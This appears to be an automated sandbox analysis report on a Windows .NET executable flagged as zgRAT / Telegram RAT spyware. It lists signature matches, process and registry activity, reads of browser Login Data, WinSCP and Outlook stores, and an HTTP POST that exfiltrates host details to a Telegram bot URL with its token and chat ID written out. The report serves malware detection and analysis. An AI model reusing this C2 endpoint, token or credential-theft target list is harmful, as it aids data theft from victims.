Click to jump to signature section
Source: JFFjXW16yR.exe.2944.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendMessage"} |
Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability |
Source: JFFjXW16yR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: JFFjXW16yR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: unknown | DNS query: name: api.telegram.org |
Source: global traffic | HTTP traffic detected: POST /bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333631912&caption=??%20OC%20verison%20-%20Microsoft%20Windows%20NT%206.2.9200.0%0AMachineName%20-%20767668/user%0ACurrent%20time%20-%2008/10/2024%2007:52:00 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce76e17bd62bdHost: api.telegram.orgContent-Length: 389Expect: 100-continueConnection: Keep-Alive |
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220 |
Source: Joe Sandbox View | ASN Name: TELEGRAMRU TELEGRAMRU |
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e |
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: global traffic | DNS traffic detected: DNS query: api.telegram.org |
Source: unknown | HTTP traffic detected: POST /bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333631912&caption=??%20OC%20verison%20-%20Microsoft%20Windows%20NT%206.2.9200.0%0AMachineName%20-%20767668/user%0ACurrent%20time%20-%2008/10/2024%2007:52:00 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dce76e17bd62bdHost: api.telegram.orgContent-Length: 389Expect: 100-continueConnection: Keep-Alive |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003693000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003663000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003679000.00000004.00000800.00020000.00000000.sdmp, JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5U/sendDocument?chat_id=6333 |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/botE7487818328:AAGmIqXHljqLNUPxdc-QpOwPXooEPkvNg5UF/sendDocument?chat_id=G6 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730 |
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443 |
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49730 version: TLS 1.2 |
Source: JFFjXW16yR.exe, type: SAMPLE | Matched rule: Detects zgRAT Author: ditekSHen |
Source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B774776 | 0_2_00007FFD9B774776 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B773BFB | 0_2_00007FFD9B773BFB |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B773FFA | 0_2_00007FFD9B773FFA |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B773798 | 0_2_00007FFD9B773798 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B771570 | 0_2_00007FFD9B771570 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B771541 | 0_2_00007FFD9B771541 |
Source: JFFjXW16yR.exe, 00000000.00000000.1699441650.0000000000F64000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamefiremen.exe4 vs JFFjXW16yR.exe |
Source: JFFjXW16yR.exe | Binary or memory string: OriginalFilenamefiremen.exe4 vs JFFjXW16yR.exe |
Source: JFFjXW16yR.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: JFFjXW16yR.exe, type: SAMPLE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT |
Source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT |
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs | Cryptographic APIs: 'CreateDecryptor' |
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/4@1/1 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\JFFjXW16yR.exe.log | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Mutant created: NULL |
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2256:120:WilError_03 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | File created: C:\Users\user\AppData\Local\Temp\tmp18BD.tmp | Jump to behavior |
Source: JFFjXW16yR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: JFFjXW16yR.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80% |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: JFFjXW16yR.exe, 00000000.00000002.1729092261.000000000352D000.00000004.00000800.00020000.00000000.sdmp, tmp18BD.tmp.dat.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); |
Source: unknown | Process created: C:\Users\user\Desktop\JFFjXW16yR.exe "C:\Users\user\Desktop\JFFjXW16yR.exe" |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: mscoree.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: apphelp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: vcruntime140_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ucrtbase_clr0400.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ntmarta.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: rasapi32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: rasman.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: rtutils.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: dhcpcsvc6.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: dhcpcsvc.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: dnsapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: rasadhlp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: fwpuclnt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: secur32.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: schannel.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: mskeyprotect.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ntasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ncrypt.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: ncryptsslp.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Section loaded: gpapi.dll | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Jump to behavior |
Source: JFFjXW16yR.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR |
Source: JFFjXW16yR.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE |
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs | .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)}) |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B77C421 push eax; iretd | 0_2_00007FFD9B77C42D |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Code function: 0_2_00007FFD9B7700BD pushad ; iretd | 0_2_00007FFD9B7700C1 |
Source: JFFjXW16yR.exe, SQLite.cs | High entropy of concatenated method names: 'GetValue', 'GetRowCount', 'jZQ595ta2', 'YK7Og0iSu', 'ReadTable', 'HB5cdqj5y', 'rM5CVlCjT', 'IRTNlAva6', 'ULSPsqOUP', 'YTUmtab7VIrZgagPPp2' |
Source: JFFjXW16yR.exe, Asn1Der.cs | High entropy of concatenated method names: 'Parse', 'SDTVhjq5MuqPcYxE3nI', 'jM2TyfqO7URdecETq9F', 'xW3EAoqcM6yXnDP4PLv', 'z8qkNnqCGqinv8kMOtG', 'lwFF1nqNWpv61t8TkiR', 'rp9lPLq6qabWHDZQ9td', 'AAkHFUq0tpBvfexA0UN' |
Source: JFFjXW16yR.exe, Chromium.cs | High entropy of concatenated method names: 'IvWMLRH99LZrCU4EbH9', 'gJBomTHuTbqIUw3Pl6Z', 'vcJNO9HRbq4Wt6B1m7J', 'Dispose', 'SO1IjDHpD5RPhxTdfsd', 'VbJv8aHi4sWvUKAyHCA', 'cQa55QHXX50SvTlCeQ6', 'oM8kBZHYt9IHwrPeYuj', 'RZcYQRH8RioS2QiBUtP', 'uAAjH2HAJH92NSGdesQ' |
Source: JFFjXW16yR.exe, Pbkdf2.cs | High entropy of concatenated method names: 'GetBytes', 'oICK3qCDM', 'MFWEaFWiZ', 'StrCredentialsRecovery', 'CiHSOrqZlE53VlOvnqB', 'emW6PUqFSSnG2cFy9qG', 'oUspEsqVaKw9iWV9TeK', 'erPKmfqW3EgMbDqDPKH', 'qYCFokq2j0kHaWXCjRd', 'P8lj9LqfuyiPcvkXUPb' |
Source: JFFjXW16yR.exe, Dq2vtoXitgeILmvprM.cs | High entropy of concatenated method names: 'f3kkrRo09', 'itnqnXqJxY5d3OCYaao', 'Tcu37ZqsNwroWxtFy7K', 'qHxJTnqSp2WeeGL4PS6', 'DHdlBQqduyuFvwwGyM2', 'VOyR0WqQTSg5eTlvPQb', 'z615KyqgybZpYdlRxis' |
Source: JFFjXW16yR.exe, fAms6Se0H90iM26npfb.cs | High entropy of concatenated method names: 'ak8SGM3lPpdFI5Mffw2', 'oc9lAb3b5eUiYTfTG7A', 'zLLIwRsG5p', 'Xj7DYR36vbcxf2YMX8G', 'MwgmnU304fWOy3c0ahK', 'laH1VZ35LdNlTUalR19', 'ObtqtU3OAoFHeosCRiq', 'KgRLBU3cwBuS8Qst9fo', 'DCr9CG3CmukaQuNKkm1', 'RsYKmV3NsiECwrxw4Ea' |
Source: JFFjXW16yR.exe, wkqHS2d1VcVl43Ydy26.cs | High entropy of concatenated method names: 'kVLLB1Elri', 'MAnLoRkxrB', 'qSML1mJu5r', 'VBDLuOcwEa', 'em1LR0k0BA', 'jiTL9q2Sul', 'O51LMKw2Rk', 'YiqQJM0H8P', 'YiHLigHIHM', 'exyLX3shtm' |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Memory allocated: 16A0000 memory reserve | memory write watch | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Memory allocated: 1B420000 memory reserve | memory write watch | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe TID: 2188 | Thread sleep time: -30000s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe TID: 5236 | Thread sleep time: -922337203685477s >= -30000s | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Thread delayed: delay time: 922337203685477 | Jump to behavior |
Source: JFFjXW16yR.exe, 00000000.00000002.1729630254.000000001BFDA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Process token adjusted: Debug | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Memory allocated: page read and write | page guard | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Queries volume information: C:\Users\user\Desktop\JFFjXW16yR.exe VolumeInformation | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR |
Source: Yara match | File source: JFFjXW16yR.exe, type: SAMPLE |
Source: Yara match | File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000000.00000000.1699400216.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR |
Source: Yara match | File source: JFFjXW16yR.exe, type: SAMPLE |
Source: Yara match | File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Jump to behavior |
Source: C:\Users\user\Desktop\JFFjXW16yR.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | Jump to behavior |
Source: Yara match | File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003552000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR |
Source: Yara match | File source: JFFjXW16yR.exe, type: SAMPLE |
Source: Yara match | File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000000.00000000.1699400216.0000000000F02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY |
Source: Yara match | File source: 00000000.00000002.1729092261.0000000003421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: JFFjXW16yR.exe PID: 2944, type: MEMORYSTR |
Source: Yara match | File source: JFFjXW16yR.exe, type: SAMPLE |
Source: Yara match | File source: 0.0.JFFjXW16yR.exe.f00000.0.unpack, type: UNPACKEDPE |